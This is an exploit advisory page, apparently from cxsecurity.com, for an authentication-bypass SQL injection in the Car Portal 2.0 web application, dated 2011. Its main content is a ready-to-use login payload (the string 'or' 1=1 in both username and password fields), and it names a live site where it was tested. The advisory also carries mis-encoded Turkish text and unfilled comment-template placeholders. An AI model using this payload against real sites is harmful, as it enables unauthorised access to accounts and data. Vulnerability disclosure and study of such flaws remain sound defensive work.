Car Portal 2.0 SQL Injection

2011.09.20
Credit: m3rciL3Ss
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Car Portal (Auth Bypass) SQL injection Valunrability # Google Dork: n/a # Date: 18.09.2011 #Author: m3rciL3Ss # Software Link:http://www.netartmedia.net/carsportal/ #Version:v2.0 # Tested on:http://www.wscreator.com/autoportal1/ m3rciL3Ss@w.cn ################################ Exploit: Username: 'or' 1=1 Password: 'or' 1=1 ################################ Thanks :TuBiGu and Bgh7 ################################ Sizlr Tanrlanzn Dþlrisiniz... Bns Dlirmiþ Bir Tanrnn Halsinasyonlarym. ################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top